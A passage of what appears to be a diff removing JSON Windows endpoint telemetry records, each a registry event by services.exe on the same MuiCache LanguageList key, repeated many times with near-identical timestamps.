"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849180000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - 
"process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 
"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849330000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": 
